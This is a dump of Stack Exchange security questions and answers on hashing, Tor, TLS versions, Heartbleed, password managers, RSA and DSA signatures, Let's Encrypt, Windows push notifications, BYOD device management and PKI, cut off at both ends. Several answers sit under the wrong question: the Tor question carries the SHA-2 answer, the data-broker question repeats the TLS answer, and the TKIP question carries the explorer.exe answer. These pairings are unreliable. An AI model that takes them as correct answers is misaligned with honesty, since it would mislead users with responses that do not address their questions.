noise Use a noise reduction filter (with aggressive reduction) Rotate Distort the image (by applying multiple camera "lens correction", for example) Convert the image to grayscale increase the contrast (or, preferably, completely convert to black-and-white) Reduce resolution (preferably by a near-to-irrational factor) Compress the image (high JPEG compression, for example) In general, do everything you can to obfuscate and reduce the amount of information contained in the image while keeping the document reasonably readable. Finally, after all the other steps, remove the medatadata from your files . You can use specialized software to do this.
{ "source": [ "https://security.stackexchange.com/questions/86917", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73273/" ] }
87,154
I'm confused on the difference between SHA-2 and SHA-256 and often hear them used interchangeably (which seems really wrong). I think SHA-2 a "family" of hash algorithms and SHA-256 a specific algorithm in that family. Is that correct? Can someone please clarify?
Just to cite wikipedia: http://en.wikipedia.org/wiki/SHA-2 : The SHA-2 family consists of six hash functions with digests (hash values) that are 224, 256, 384 or 512 bits: SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224, SHA-512/256. So yes, SHA-2 is a range of hash functions and includes SHA-256.
{ "source": [ "https://security.stackexchange.com/questions/87154", "https://security.stackexchange.com", "https://security.stackexchange.com/users/2075/" ] }
87,172
When the Tor exit node executes the client's request and receives a response from the server, it must create an onion cell that can be reversely decrypted along a circuit through the Tor network. Thus, the client must be the last one to decrypt, otherwise the contents of the request can be linked back to the client's IP by the first intermediate (bridge) node, breaking anonymity. Therefore it seems the exit node would need to first encrypt the response from the target server with the public key of the client -- therefore the client will be the only one that can decrypt and get the plaintext response. However, how can the exit node encrypt with the public key of the client? If it had this knowledge wouldn't it be able to determine the identity of the client?
Just to cite wikipedia: http://en.wikipedia.org/wiki/SHA-2 : The SHA-2 family consists of six hash functions with digests (hash values) that are 224, 256, 384 or 512 bits: SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224, SHA-512/256. So yes, SHA-2 is a range of hash functions and includes SHA-256.
{ "source": [ "https://security.stackexchange.com/questions/87172", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73511/" ] }
87,283
I just wanted to confirm, my system admin is telling me that TLS 1.0 is more secure than TLS 1.2 and told me I should stay on TLS 1.0...is this accurate? He mentioned that TLS 1.2 is more vulnerable and that TLS 1.0 is more secure. And that the Heartbleed bug is most vulnerable from TLS 1.1. and TLS 1.2 and NOT from TLS 1.0. Thank you!
Your admin got it real wrong (or there was some translation mishap). TLS 1.1 and 1.2 fix some issues in TLS 1.0 (namely, predictability of IV for CBC encryption of records). It is possible to work around this issue in TLS 1.0, but it depends on how hard the implementations work at it. So, in that sense, TLS 1.1 and 1.2 are more secure than TLS 1.0, since they are easier to implement securely. The so-called "heartbleed" is not a protocol flaw; it is an implementation bug that is present in some OpenSSL versions (OpenSSL is a widespread implementation of SSL/TLS, but certainly not the only one). When an OpenSSL version has that bug, it has it for all protocol versions, including TLS 1.0. Thus, when heartbleed applies, it equally applies to TLS 1.0, TLS 1.1 and TLS 1.2. When it does not apply, well, it does not apply. The source of the confusion is that your admin (or his sources) does not appear to understand or conceptualize the difference between protocols and implementations . TLS 1.0 and TLS 1.2 are protocols described in relevant standards ( RFC 2246 and RFC 5246 , respectively). A protocol says what bytes must be sent when. An implementation is a piece of software that runs the protocol. OpenSSL is an implementation. It so happens that the "heartbleed" bug occurs in the implementation of a relatively new protocol feature (the "heartbeat extension") that very old OpenSSL implementations don't know about. Thus, very old implementations of OpenSSL don't suffer from heartbleed (though they have other serious issues, being very old). The same very old implementations don't know about TLS 1.1 and TLS 1.2 at all. Thus, in the mind of your admin, the two independent facts coalesced into a single (but flawed) mantra, that wrongly says that heartbleed is a security issue of TLS 1.1 and 1.2.
{ "source": [ "https://security.stackexchange.com/questions/87283", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73638/" ] }
87,289
I received several automated emails at an early hour from several data brokers (e.g., Spokeo) asking me to confirm an opt-out for my email address and name. I did not request these, but did so about 2 years ago from most data brokers, and accidentally clicked on one of the links. The originating email address as well as the domain/IP from the email server look legitimate and the links go to the appropriate domain. I am somewhat concerned because it happened within a short period on several brokers that ostensibly are separately owned, suggesting a human may have done this manually. On the other hand, it seems more strange the malicious. Is there any reason a malicious third party might be doing this?
Your admin got it real wrong (or there was some translation mishap). TLS 1.1 and 1.2 fix some issues in TLS 1.0 (namely, predictability of IV for CBC encryption of records). It is possible to work around this issue in TLS 1.0, but it depends on how hard the implementations work at it. So, in that sense, TLS 1.1 and 1.2 are more secure than TLS 1.0, since they are easier to implement securely. The so-called "heartbleed" is not a protocol flaw; it is an implementation bug that is present in some OpenSSL versions (OpenSSL is a widespread implementation of SSL/TLS, but certainly not the only one). When an OpenSSL version has that bug, it has it for all protocol versions, including TLS 1.0. Thus, when heartbleed applies, it equally applies to TLS 1.0, TLS 1.1 and TLS 1.2. When it does not apply, well, it does not apply. The source of the confusion is that your admin (or his sources) does not appear to understand or conceptualize the difference between protocols and implementations . TLS 1.0 and TLS 1.2 are protocols described in relevant standards ( RFC 2246 and RFC 5246 , respectively). A protocol says what bytes must be sent when. An implementation is a piece of software that runs the protocol. OpenSSL is an implementation. It so happens that the "heartbleed" bug occurs in the implementation of a relatively new protocol feature (the "heartbeat extension") that very old OpenSSL implementations don't know about. Thus, very old implementations of OpenSSL don't suffer from heartbleed (though they have other serious issues, being very old). The same very old implementations don't know about TLS 1.1 and TLS 1.2 at all. Thus, in the mind of your admin, the two independent facts coalesced into a single (but flawed) mantra, that wrongly says that heartbleed is a security issue of TLS 1.1 and 1.2.
{ "source": [ "https://security.stackexchange.com/questions/87289", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73644/" ] }
87,307
Background Trevor posed a question about the nature and validity of using a password manager, given the current prevailing model of authentication on most web resources. Caveat: this is not the naive question about whether password managers are insecure in general, Trevor knows that question has been asked and answered many times over (it's all about relative risk). Caveat: this is also not the routine question of the relative risk profile between password managers and memorization and manual entry alone. Trevor is familiar with that discussion as well. Questions Trevor asked a question which calls into dispute whether password managers are obsolete on the basis of functionality . If a user can reliably select "I forgot my password" on most web sites, and have a password-reset initiated and a link sent to their e-mail inbox, then isn't their e-mail inbox serving the same functionality of a password manager? What is the benefit of trying to remember a password, or storing a password in a manager if a user can reliably get a password reset link every time they wish to login to the site ? Note This question is not identical to If I include a Forgot Password service, then what's the point of using a password? . Although similar, this question is intended to uncover what relative advantage (or disadvantage) exists when the use-case is compared to a password manager. In the other question, the use-case is compared to rote memorization, and does not identify the fact that a password manager may very well be equivalent to simply forgetting passwords and using a one-time login.
Your argument is contingent upon using a web based service. If you use your password manager for SFTP, encrypted drives, desktop apps, etc. then you don't have a self service reset option. If we then want to continue the argument only for web apps, here are some issues: This requires you to use one email address, which may not be practical (work versus personal email should not be commingled) or may not be desired (anonymity concerns, organization, shared email for a club, etc.). If you use multiple email addresses this also reduces the impact of one of them being compromised. This requires the service provider to require an email address, not all services request or require you to provide an email address. I am not sure you want to count on reliability of a reset service. This may take significantly longer for the reset email to go through. The service provider may ( should ) rate limit such requests. Password resets are not designed for this purpose. A password reset may be part of a comprehensive analysis to put the account on a higher alert for monitoring. The account was just reset, this is unusual, so apply more monitoring and checks because the reset may indicate an account takeover. Password resets are not generally considered the norm . For a password reset there is often challenge questions, so these still have to be entered each time. This is needed because the email account cannot be known to be secure or isolated to the user. Depending on who you ask, this is sort of combining "something you know" (challenge questions) with "something you have" (the email account). I would personally rather the attacker had to break into my computer rather then find a flaw in the email providers system, internal networks, etc. I don't really feel like my email on the Internet is secure or private. Even if this was super fast, in every case and there were no challenge questions, its still tedious, requires switching tabs, etc. You may also get distracted by your other emails, things may accidentally go to SPAM. I use a keyboard shortcut for auto-type, very quick and transparent. My password manager also clears out my clipboard. At the end of the day, I think I have more control over my desktop password manager, it applies in many more scenarios, and its easier and more reliable.
{ "source": [ "https://security.stackexchange.com/questions/87307", "https://security.stackexchange.com", "https://security.stackexchange.com/users/7377/" ] }
87,325
I'm learning asymmetric encryption in the use case of ssl/tls protocol. I can understand that the public key (like a padlock) can encrypt (lock) something and only the private key can decrypt (open) it. But I just can't understand the other way around. How can the public key verify digital signatures encrypted by CA's private key? A lot of material says that a public key can't be used for decryption (that's fine, if imagine the public key is a padlock, then that's for sure, you're not able to unlock things). Then how can public keys be used to verify digital signatures, given that it can't be used to decrypt? I can understand that public keys/private keys are used for client server verification. A server encrypts some secrets and ask the client to decrypt it, and compares the results, then I can know whether you're the holder of the private key. But as for digital signatures, it's a different story, because I think in the digital signature, it doesn't contain the private key of the issuer, right? Then how can the above verification can be done without private key decrypting?
The whole concept of trying to explain signatures with the terminology of encryption is flawed. It simply does not work. So let's unravel the whole thing, and this will require some formalism. Formally , a cryptographic signature system consists in three algorithms: KeyGen : takes as input a "security parameter" (say, the length of the key we want to obtain), and produces a new public/private key pair ( K p , K s ). Sign : takes as input a message m and a private key K s ; output is a signature s . Verify : takes as input a message m , a signature s and a public key K p ; output is a boolean ( true on success, false if the signature is not valid). The system is said to be sound if the algorithms operate as advertised ( Sign produces signatures that Verify accepts, using key pairs produced by KeyGen ). The system is said to be cryptographically secure if it is computationally infeasible to make forgeries : given a public key K p , and without knowing K s _, it should not be feasible (within the limits of existing technology) to produce a ( m , s ) pair such that Verify ( m , s , K p ) = true . The definition implies, in particular, that the private key should not be computable from the public key alone, because otherwise forgeries would be easy. None of the above says anything about how the algorithms work. Various systems have been invented, described and standardized. RSA is a very well-known asymmetric algorithm, but that's wrong, because RSA is not one algorithm. RSA is the name for an internal operation called a trapdoor permutation , from which an asymmetric encryption system and a signature system have been derived. The RSA operation is, roughly, the following: Let n be a big integer such that n = pq , where p and q are two big, distinct primes. Knowledge of p and q is the "private key". Let e be some (usually small) integer, called the "public exponent"; e must be such that it is relatively prime to both p-1 and q-1 . Traditional values for e are 3 and 65537. Given an integer x modulo n (an integer in the 0 to n-1 range), the RSA forward operation is computing x e mod n ( x is raised to exponent e modulo n ). This is easy enough to do. It so happens that this operation is a permutation of integers modulo n (each y modulo n is equal to x e mod m for exactly one x ). The "magic" part is that, for some reason, nobody found an efficient way to compute the reverse operation (getting x from x e mod n ) without knowing p and q . And that's not for lack of trying; integer factorization has been studied by the finest minds for more than 2500 years. When you know p and q , the RSA reverse operation becomes easy. The knowledge of p and q is thus called the trapdoor . Now that we have this trapdoor permutation, we can design a signature algorithm which works the following way: KeyGen : given a target length k , produce two random primes p and q of length about k /2 bits, such that p-1 and q-1 are both relatively prime to an a priori chosen e (e.g. e = 3), and n = pq has length k bits. The public key is ( n , e ), the private key is ( p , q , e ). Sign : take message m , hash it with some hash function (e.g. SHA-256), and "turn" the hash output (a sequence of 256 bits in the case of SHA-256) into an integer y modulo n . That transform is what the padding is about, because the standard method (as described in PKCS#1 ) is writing the hash output with some extra bytes, and then interpreting the result as an integer (in big-endian convention in the case of PKCS#1). Once the hashed message has been converted through the padding into an integer y , the private key owner applies the trapdoor (the reverse RSA operation) to compute the x such that x e = y mod n (such a x exists and is unique because the RSA operation is a permutation). The signature s is the encoding into bytes of that integer x . Verify : given a signature s , decode it back into an integer x modulo n , then compute y = x e modulo n . If this value y is equal to what would be the padding of h ( m ) (hash of message m ), then the signature is accepted (returned value is true ). RSA encryption is another, distinct system, that also builds on the RSA trapdoor permutation. Encryption is done by raising an integer x to the exponent e modulo n ; decryption is done by reversing that operation thanks to the knowledge of the private key (the p and q factors). Since such a system processes only big integers, and we want to encrypt and decrypt bytes , then there must also be some sort of conversion at some point, so a padding procedure is involved. Crucially, the security requirements for the encryption padding are quite distinct from those for the signature padding. For instance, the encryption padding MUST include a substantial amount of randomness, while the signature padding MUST include a substantial amount of determinism. In practice, the two padding systems are quite different. When people looked at RSA signatures and RSA encryption, they found it fit to describe signatures as a kind of encryption. If you look at it, the RSA forward operation (raising to the exponent e ) is done for RSA encryption, and also for RSA signature verification. Similarly, the reverse operation is done for RSA decryption, and for RSA signature generation. Furthermore, as a stroke of genius if genius was about confusing other people, some noticed that the RSA reverse operation can also be mathematically expressed as "raising an integer to some power modulo n ", just like the forward operation (but with a different exponent). Thus they began to call that reverse operation "encryption". At that point, RSA encryption, RSA decryption, RSA signature generation and RSA signature verification are all called "encryption". For some weird psychological reason (I blame the deleterious effects of post-Disco pop music), many people still find it pedagogically sound to try to explain four different operations by first giving them the same name. We described RSA; let's have a look at another, completely different algorithm called DSA . DSA does not use a trapdoor permutation. In DSA, we do computations modulo a big prime (traditionally called p ) and modulo another, smaller prime (called q ) which is such that p-1 is a multiple of q . p and q are known to everybody. There is an operation-that-goes-one-way in DSA. Given an integer g modulo p (strictly speaking, in a specific subset of p called the subgroup of order q ) and an integer x modulo q , everybody can compute g x mod p ; however, recovering x from g x mod p is computationally infeasible. While this somehow looks like RSA, there are crucial differences: Here, the operation is raising g to exponent x , where the actual input is x (the exponent), because g is a fixed, conventional value. This is not a permutation, because x is an integer modulo q and g x mod p is an integer modulo p , a quite different set. This is certainly not a trapdoor: there is no "secret knowledge" that allows recovering x , except if you already know that exact value x . However, a signature algorithm can be built on that operation. It looks like this: KeyGen : the p , q and g integers are already fixed, and potentially shared by everybody. To generate a new private key, produce a random integer x between 1 and q -1. The public key is y = g x mod p . Sign : Given a message m , hash it, then convert the hash value into an integer h modulo q . Generate a new, fresh, discard-after-use random integer k between 1 and q-1 . Compute r = g k mod p mod q (the exponentiation is done modulo p , then the result is furthermore reduced modulo q ). Compute s = ( h + xr ) / k mod q . The signature is ( r , s ). Verify : Hash message m to recompute h . Compute w = 1 / s mod q . Compute u 1 = hw mod q . Compute u 2 = rw mod q . Compute v = g u 1 y u 2 mod p mod q . If v = r , the signature is valid; otherwise, it is not. Now good luck with trying to describe that as some sort of "encryption". If you find that it is unclear what is being encrypted here, it is because nothing is encrypted here. This is not encryption. However, there is an hand-waving conceptual description of signatures that works with both RSA, DSA, and many other signature algorithms. You can view signatures as a specific kind of authentication. In authentication , one person (the prover ) demonstrates his identity to another (the verifier ). The prover does this by performing some action that only that person can do, but in such a way that the verifier can be convinced that he witnessed the genuine thing. For instance, a very basic authentication system is called "show-the-password": the prover and the verifier both know a shared secret (the "password"); the prover demonstrates his identity to the verifier by uttering the password. For signatures , we want something a bit more complex: The signature is asynchronous. The signer acts once; verification is done afterwards, possibly elsewhere, and without any further active help from the signer. The verifier should not need to know any secret. The signature should be convincing for everybody. By signing, the signer shall not reveal any secret. His private key should not be consumed (yes, I know there are signature schemes that work with consumption; let's not go there). The signature should be specific to a given message m . One rather generic structure for authentication schemes is based on challenges : the verifier sends to the prover a challenge, that the prover can answer to only thanks to his knowledge of his secret. If you look at RSA, then you can see that it is a challenge-based authentication mechanism. The challenge is the hashed-and-padded message. The signer demonstrates his mastery of the private key by applying the RSA reverse operation on that challenge, something that only he can do; but everybody can apply the RSA forward operation to see that the challenge was indeed well met. If you look at DSA, then you can again see a challenge-based authentication mechanism. The signer first commits to a secret value k by publishing r ; then the challenge is (again) the message h combined with the commitment r ; the signer can answer to that challenge only by using his private key x . In DSA, the signer has a permanent private key x , produces a one-shot private value k , and demonstrates his knowledge of x/k mod q . (This does not leak information on x because k is used only once.) Summary: signature algorithms are not encryption algorithms, and explanations of signatures based on encryption can only be, at best, utterly confusing. A much better explanation is by showing that a signature algorithm is, in fact, a specific kind of authentication mechanism, by which the signer demonstrates his knowledge of the private key in response to a synthetic challenge that involves the signed message. This authentication is convincing for bystanders as long as the said challenge is sufficiently well specified that it is provably not cooked in the advantage of the signer. In RSA, it is the result of a deterministic hashing and padding (and the padding takes care to avoid the values where the RSA reverse operation becomes easy). In DSA, the challenge is computed from a prior commitment of the signer. Indeed, any zero-knowledge authentication system can be turned into a signature mechanism by making it non-interactive: since a ZK system works by commitments, challenges and responses to these challenges, you can make the signer compute all his commitments, hash them all along with the message to sign, and use the hash value as the challenges. This does not mean that a ZK proof lurks within all signature algorithms; however, if you find that DSA kinda looks like that, well, there are good reasons for that.
{ "source": [ "https://security.stackexchange.com/questions/87325", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73596/" ] }
87,375
I was just reading about SSL/TLS stuff, and according to this site (which is rated as A by Qualys SSL Labs), MD5 is totally broken, and SHA-1 is cryptographically weak since 2005. And yet, I noticed that a lot of programmers and even Microsoft only give us SHA-1/MD5 to check the integrity of files... As far I know, if I change one bit of a file, their MD5/SHA-1 will change so why/how they are broken? In which situations can I still trust checksums made with SHA-1/MD5? What about SSL certificates that still use SHA-1 like google.com? I am interested in applications of MD5 and SHA-1 for checksums and for certificate validation. I am not asking about password hashing, which has been treated in this question .
SHA-1 and MD5 are broken in the sense that they are vulnerable to collision attacks. That is, it has become (or, for SHA-1, will soon become) realistic to find two strings that have the same hash. As explained here , collision attacks do not directly affect passwords or file integrity because those fall under the preimage and second preimage case, respectively. However, MD5 and SHA-1 are still less computationally expensive. Passwords hashed with these algorithms are easier to crack than the stronger algorithms that currently exist. Although not specifically broken, using stronger algorithms is advisable. In the case of certificates, signatures state that a hash of a particular certificate is valid for a particular website. But, if you can craft a second certificate with that hash, you can impersonate other websites. In the case of MD5, this has already happened, and browsers will be phasing out SHA-1 soon as a preventative measure ( source ). File integrity checking is often intended to ensure that a file was downloaded correctly. But, if it is being used to verify that the file was not maliciously tampered with, you should consider an algorithm that is more resilient to collisions (see also: chosen-prefix attacks ).
{ "source": [ "https://security.stackexchange.com/questions/87375", "https://security.stackexchange.com", "https://security.stackexchange.com/users/64261/" ] }
87,395
I am interested in watching an upcoming webinar that will discuss Puppet on AWS. In order to participate one needs to install a software application . Naturally, I won't do that as I can find enough information about the subject with a few simple Google services. However, sometimes there are webinars that I am interested in participating in. What criteria might an average user use to decide if a software package seems safe enough to install . Though Firefox is open source, I'm satisfied enough to trust the Mozilla binaries and I couldn't review all the source alone even if I weren't willing to trust the binaries. So that is a lower limit of what I'll install. What would be reasonable criteria for establishing a reasonable upper limit? Of course, I'm not looking for 100% security as nobody can provide that. I'm looking for something reasonable for average users who are not software developers. The computer is useless without installing third-party applications, even if the OS provided them via a repo.
Trust is not a boolean variable, "trusted = true / false", you should better think about trust level . A few example of questions which may help you to evaluate the trust level you can grant to this software: How much do you trust the editor of this software? Could the software have been modified by a malicious 3rd-party between being created and being delivered to your computer? What is the sensitivity of the data you need provide to this software? What is the sensitivity of the data residing on the computer which will run this software? How long and how often will need to use this software? If I correctly understand your question: You do not trust the editor, otherwise you wouldn't have asked this question in the first place, This software will just need the information related to this webinar you will attend, Your computer hosts sensitive or at least personal information which makes you worry about trust issues, This will be a one spot usage for this webinar, at best for further reference only. In such conditions, I would just create some virtual machine so I would not worry anymore with any privacy issue while being free to comply with the webinar requests. Once the webinar ends, I will be free to either archive the VM image or drop it.
{ "source": [ "https://security.stackexchange.com/questions/87395", "https://security.stackexchange.com", "https://security.stackexchange.com/users/4758/" ] }
87,443
Let's Encrypt is an initiative from the Electronic Frontier Foundation (EFF), Mozilla, Cisco, Akamai, IdenTrust, and researchers at the University of Michigan that aims to automatically provide every domain owner with a recognized certificate that can be used for TLS. In order to prove that you own a domain, you need to install a file with particular (randomly generated) contents at a particular (randomly generated) URL on that domain. The Let's Encrypt server will verify this by accessing the URL, before signing the certificate. Now, suppose I have some attack which will make the domain awesomebank.example resolve to my server. Suppose I can also MITM some peoples' connections to https://awesomebank.example/ . TLS is intended to prevent me from seeing or altering their communications to the server without being detected. What prevents me from using this attack on the Let's Encrypt server, and obtaining a certificate for awesomebank.example , and then using it to MITM customers of AwesomeBank without being detected (because I have a valid certificate)? Doesn't the existence of a fully automated CA make the Internet less secure?
Same security as other DV certs What prevents me from using this attack on the Let's Encrypt server, and obtaining a certificate for awesomebank.example, and then using it to MITM customers of AwesomeBank without being detected (because I have a valid certificate)? Nothing. If you own the network, then you own the network. And DV type certs (see below) rely on the network for proof of domain ownership. There are usually no out-of-band checks. (Nobody will call your phone, nobody will check your photo ID, nobody will visit you at the place the company is registered to, etc.) Doesn't the existence of a fully automated CA make the Internet less secure? Nope. Same level of security as DV type certs. There are (currently) three assurance levels for x509 certs: DV, Domain Validation OV, Organization Validation EV, Extended Validation DV is the cheapest. It basically means "If somebody can answer an email to [email protected], then that person gets a certificate for example.com" . There are additional checks for OV, EV. More info about cert types: GlobalSign.com: What are the different types of SSL Certificates? (Archived here .) Wikipedia: https://en.wikipedia.org/wiki/Public_key_certificate#Validation_levels And a lot more background info in these slides here: RSAConference2017, Session ID: PDAC-W10, Kirk Hall, 100% Encrypted Web -- New Challenges for TLS Further reading Ryan Hurst, 2016-01-06, Understanding risks and avoiding FUD (Archived here .) Nice blog post by GlobalSign CTO Ryan Hurst on his private blog. He largely makes the same points as me. But it's a lot more in depth. And it's a bit of a rant against TrendMicro's rhetoric against Let's-Encrypt. Note that TrendMicro and GlobalSign both sell SSL certificates and are direct competitors. (Also: They both are members of the CAB Forum and members of the CA Security Council .) Update 2018-03-06 : Scott Helme, 2018-03-06, Debunking the fallacy that paid certificates are better than free certificates, and other related nonsense (Archived here .)
{ "source": [ "https://security.stackexchange.com/questions/87443", "https://security.stackexchange.com", "https://security.stackexchange.com/users/40059/" ] }
87,505
McAfee is seeing Windows Explorer ( explorer.exe ) establishing connections to external IPs: Also verified with cmd: C:\Windows\system32>tasklist|find "explorer.exe" explorer.exe 4052 Console 1 305,072 K C:\Windows\system32>netstat -anob|find "4052" TCP 192.168.1.19:19049 111.221.124.106:443 ESTABLISHED 4052 C:\Windows\system32> Why is Windows Explorer connecting to external IPs? Is it OK to block Windows Explorer from all ports (e.g. with a firewall like McAfee / Kaspersky) or would that lead to system instability? • Tested on Win 8.1 basic.
This is normal and expected behavior for windows system. The IP you mentioned resolves to sinwns2012412. wns .windows.com. The Windows Push Notification Services (WNS) enables third-party developers to send toast, tile, badge, and raw updates from their own cloud service. This provides a mechanism to deliver new updates to your users in a power-efficient and dependable way. How it works: The following diagram shows the complete data flow involved in sending a push notification. It involves these steps: Your app sends a request for a push notification channel to the Notification Client Platform. The Notification Client Platform asks WNS to create a notification channel. This channel is returned to the calling device in the form of a Uniform Resource Identifier (URI). The notification channel URI is returned by Windows to your app. Your app sends the URI to your own cloud service. This callback mechanism is an interface between your own app and your own service. It is your responsibility to implement this callback with safe and secure web standards. When your cloud service has an update to send, it notifies WNS using the channel URI. This is done by issuing an HTTP POST request, including the notification payload, over Secure Sockets Layer (SSL). This step requires authentication. WNS receives the request and routes the notification to the appropriate device. Reference: https://msdn.microsoft.com/en-us/library/windows/apps/hh913756.aspx
{ "source": [ "https://security.stackexchange.com/questions/87505", "https://security.stackexchange.com", "https://security.stackexchange.com/users/2379/" ] }
87,523
I'm reading about 802.11, from IEEE's PDF , from page 1191, and in particularly I'm reading about TKIP. To decrypt and encrypt, you use a TSC (TKIP Sequence Counter) as you can see in these images: How, and from what, is the TSC calculated?
This is normal and expected behavior for windows system. The IP you mentioned resolves to sinwns2012412. wns .windows.com. The Windows Push Notification Services (WNS) enables third-party developers to send toast, tile, badge, and raw updates from their own cloud service. This provides a mechanism to deliver new updates to your users in a power-efficient and dependable way. How it works: The following diagram shows the complete data flow involved in sending a push notification. It involves these steps: Your app sends a request for a push notification channel to the Notification Client Platform. The Notification Client Platform asks WNS to create a notification channel. This channel is returned to the calling device in the form of a Uniform Resource Identifier (URI). The notification channel URI is returned by Windows to your app. Your app sends the URI to your own cloud service. This callback mechanism is an interface between your own app and your own service. It is your responsibility to implement this callback with safe and secure web standards. When your cloud service has an update to send, it notifies WNS using the channel URI. This is done by issuing an HTTP POST request, including the notification payload, over Secure Sockets Layer (SSL). This step requires authentication. WNS receives the request and routes the notification to the appropriate device. Reference: https://msdn.microsoft.com/en-us/library/windows/apps/hh913756.aspx
{ "source": [ "https://security.stackexchange.com/questions/87523", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73626/" ] }
87,527
I am starting a new job, and I have the choice to receive a phone from the company, or to bring my own. I am considering using my own phone, to avoid having an extra device, but I want to better understand the consequences of that decision. I have an iPhone. A more recent one with iOS 8. I will stay with my current wireless carrier. I understand they can remotely wipe my phone after I leave the company (or if it's lost or stolen), and I'm okay with that, because I already back up every important app. I found this Apple article regarding enterprise iPhones , which states these specific things can and cannot be observed by the company: Examples of what a third-party management server can and cannot see on a personal iOS device. MDM can see: Device name Phone number Serial number Model name and number Capacity and space available iOS version number Installed apps MDM cannot see: Personal mail, calendars, and contacts SMS or iMessages Safari browser history FaceTime or phone call logs Personal reminders and notes Frequency of all use Device location (MDM is Mobile device management ) But I'm not certain if this applies to all iPhones in all enterprises. Concerns/questions How exactly is this done? They just configure something in settings, and I supply my lock screen passcode to give them permission? Can any of my behavior or data, outside of company-supplied apps, be observed? What apps or "root level" utilities can I expect to have installed? Will any restrictions be placed on how I can use my phone, or on the apps I can install? Is there anything else I need to be aware of? I found this related question, which discusses BYOD consequences from the company's point of view: What are the problems with bring-your-own-device related to smartphones?
Just wanted to chime in and say that the list you have there isn't entirely 100% accurate, but it is close. Keep in mind that this will vary per MDM vendor and mobile OS, but MobileIron can see your location if your employer enables the functionality and you choose to accept sharing your location data. How exactly is this done? They just configure something in settings, and I supply my lock screen passcode to give them permission? Your employer should direct you to a portal where you register your device and install the MDM application. The employer cannot see/extract nor does it know your personal PIN. Can any of my behavior or data, outside of company-supplied apps, be observed? Behavior - yes, if you take into account location data. Data outside of company supplied apps - no. However, your employer can see a list of all apps installed on your phone, so you may think twice before installing any "questionable" apps. What apps or "root level" utilities can I expect to have installed? Not sure how to answer this one exactly. It sounds like you are asking if they can install the equivalent of a rootkit on your phone? Realistically I'm inclined to answer no. Will any restrictions be placed on how I can use my phone, or on the apps I can install? Yes, your employer can black list apps. Is there anything else I need to be aware of? Yes, please refer to the infographic below. (location)
{ "source": [ "https://security.stackexchange.com/questions/87527", "https://security.stackexchange.com", "https://security.stackexchange.com/users/66096/" ] }
87,564
We have lots of questions that address portions of SSL/TLS as it relates to PKI, but none of them seem to bring everything together. A canonical answer that we can point people to I think would be quite helpful. We have How Does SSL/TLS Work? which will give a nice basis, and does contain a section on client certificates. It should be read before trying to understand PKI. We have A Different Approach to PKI which explains some problems with the overall ideas of PKI. There is How does SSL client authentication work? , which is a fairly terrible question and answer. Easy explanation of SSL client certificates for a developer is a bit better, but leaves something to be desired. There are quite a few question and answers on actually implementing a PKI , but that's a bit out of the scope of this question. I think the main questions to be answered that seem to be the source of some confusion among posters (All with respect to SSL/TLS): What is the difference between Public Key Infrastructure and Public Key Cryptography? How are they related? What is the main use case for PKI? How are client certificates used in PKI? What is a Certificate Authority's role in PKI?
Public Key Cryptography designates the class of cryptographic algorithms that includes asymmetric encryption (and its cousin key exchange) and digital signatures. In these algorithms, there are two operations that correspond to each other (encrypt -> decrypt, or sign -> verify) with the characteristic that one of the operations can be done by everybody while the other is mathematically restricted to the owner of a specific secret. The public operation (encrypting a message, verifying a signature) uses a public parameter called a public key ; the corresponding private operation (decrypting that which was encrypted, signing that which can be verified) uses a corresponding private parameter called a private key . The public and private key come from a common underlying mathematical object, and are called together a public/private key pair . The magic of asymmetric cryptography is that while the public and private parts of a key pair correspond to each other, the public part can be made, indeed, public, and this does not reveal the private part. A private key can be computed from a public key only through a computation that is way too expensive to be envisioned with existing technology. To make the story short, if you know the public key of some entity (a server, a human user...) then you can establish a secured data tunnel with that entity (e.g. with SSL/TLS in a connected context, or encrypting emails with S/MIME). The problem, now, is one of key distribution . When you want to connect to a server called www.example.com , how do you make sure that the public key you are about to use really belongs to that server ? By "belong", we mean that the corresponding private key is under control of that server (and nobody else). Public Key Infrastructures are a solution for that problem. Basically: The goal of a PKI is to provide to users some verifiable guarantee as to the ownership of public keys. The means of a PKI are digital signatures. In that sense, a PKI is a support system for usage of public key cryptography, and it itself uses public key cryptography. The core concept of a PKI is that of a certificate . A certificate contains an identity (say, a server name) and a public key , which is purported to belong to the designated entity (that named server). The whole is signed by a Certification Authority . The CA is supposed to "make sure" in some way that the public key is really owned by the named entity, and then issues (i.e. signs) the certificate; the CA also has its own public/private key pair. That way, users (say, Web browsers) that see the certificate and know the CA public key can verify the signature on the certificate, thus gain confidence in the certificate contents, and that way learn the mapping between the designated entity (the server whose name is in the certificate) and its public key. Take five minutes to grasp the fine details of that mechanism. A signature, by itself, does not make something trustworthy. When a message M is signed and the signature is successfully verified with public key K p , then cryptography tells you that the message M is exactly as it was, down to the last bit, when the owner of the corresponding private key K s computed that signature. This does not automatically tell you that the contents of M are true. What the certificate does is that it moves the key distribution problem : initially your problem was that of knowing the server's public key; now it is one of knowing the CA's public key, with the additional issue that you also have to trust that CA. How can PKI help, then ? The important point is about numbers . A given CA may issue certificates for millions of servers. Thus, by action of the CA, the key distribution problem has been modified in two ways: From "knowing the public keys of hundreds of millions of server certificates", it has been reduced to "knowing the public keys of a thousand or so of CA". Conversely, an additional trust requirement has arisen: you not only need to know the CA keys, but also you need to trust them: the CA must be honest (it won't knowingly sign a certificate with a wrong name/key association) and also competent (it won't unknowingly sign a certificate with a fake name/key association). The PKI becomes a true infrastructure when recursion is applied: the public keys of CA are themselves stored in certificates signed by some über-CA. This further reduces the number of keys that need to be known a priori by users; and this also increases the trust issue. Indeed, if CA2 signs a certificate for CA1, and CA1 signs a certificate for server S, then the end user who wants to validate that server S must trust CA2 for being honest, and competent, and also for somehow taking care not to issue a certificate to incompetent or dishonest CA. Here: CA1 says: "the public key of server S is xxx ". CA1 does not say "server S is honest and trustworthy". CA2 says: "the public key of CA1 is yyy AND that CA is trustworthy". If you iterate the process you end up with a handful of root CA (called "trust anchors" in X.509 terminology) that are known a priori by end users (they are included in your OS / browser), and that are considered trustworthy at all meta-levels. I.e. we trust a root CA for properly identifying intermediate CA and for being able to verify their trustworthiness, including their ability to themselves delegate such trustworthiness. Whether the hundred or so of root CA that Microsoft found fit to include by default in Windows are that much trustworthy is an open question. The whole PKI structure holds due to the following characteristics: PKI depth is limited. A certificate chain from a root CA down to an SSL server certificate will include 3 or 4 